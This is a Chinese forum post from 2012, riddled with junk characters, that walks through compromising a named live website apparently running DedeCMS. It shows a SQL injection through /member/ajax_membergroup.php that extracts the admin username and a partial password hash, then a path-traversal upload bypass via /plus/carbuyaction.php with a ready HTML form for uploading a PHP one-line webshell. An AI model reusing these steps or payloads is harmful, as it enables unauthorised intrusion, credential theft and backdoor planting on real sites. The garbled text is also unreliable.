①注入漏洞。( [, T8 I* C: p. ~: P7 i
这站 http://www.political-security.com/
T1 h$ ~" `( L3 j首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,8 k' `9 p& I- O: g) |% T' r
www.political-security.com/data/mysql_error_trace.inc 爆后台5 a* N, g# `6 ? U% K" l, m
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。; b) `7 X. i. d8 U3 R/ Z
然后写上语句
6 F$ e7 y6 T4 c查看管理员帐号
% Q- J, o! V; s5 D0 Z6 Y$ v' Thttp://www.political-security.co ... &membergroup=@`
* Y- O; H) z, I! t" E. O- }0 u; @4 _8 F" B# Y5 a# T" i
admin
/ L( d. R% }! l7 \* Z. k; K
( ~/ b5 {, _* D+ B3 |- G% y查看管理员密码; W0 o4 Q$ a3 B
http://www.political-security.co ... &membergroup=@`: |3 ~' {3 V$ u/ y: p( H- ]
2 y4 L, n/ y L6 y8d29b1ef9f8c5a5af429) G" \ t/ J2 |- i" G
' k8 S/ C5 S; m- }( ~
查看管理员密码! ^% u3 K7 s/ P$ g* x4 V* ]7 h
: u8 D: q# c" u* v2 a得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5* H- g% L& u3 y4 D" [+ @
: t0 K$ a# B0 ~6 G
8d2
1 ^3 R0 c0 B7 g, E) g% W. |- ^9b1ef9f8c5a5af42$ U$ C% e0 t% }6 H" ^, \( ?+ r
9. v/ K+ {- i( E
/ C9 ~. ^* i$ J$ O
cmd5没解出来 只好测试第二个方法
: Q7 a) J u+ w# R6 H. a6 r: T& y
' o4 ?; ~, [8 w3 k3 X9 h$ s' d' B- i3 v* `( l2 o! e9 p
②上传漏洞:; Z1 x C% F3 }" f1 Z
9 V) a; F8 ?6 ^% [
只要登陆会员中心,然后访问页面链接
! C+ t: A# \+ J$ [' |4 X1 o“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”# ]$ @1 ~9 j4 c
* P/ N1 J$ R2 i# D3 ^( p; J如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
8 |$ \& ~0 |* U) [
6 v" c3 N3 t! h于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm9 H; y% A8 m5 r! u
' |5 f/ { A& ^<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
3 i" ^5 u- _) n! T4 i& c* t% a& G" i; c或者: _$ d- S J# y' V0 K1 Q7 P! R2 S
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对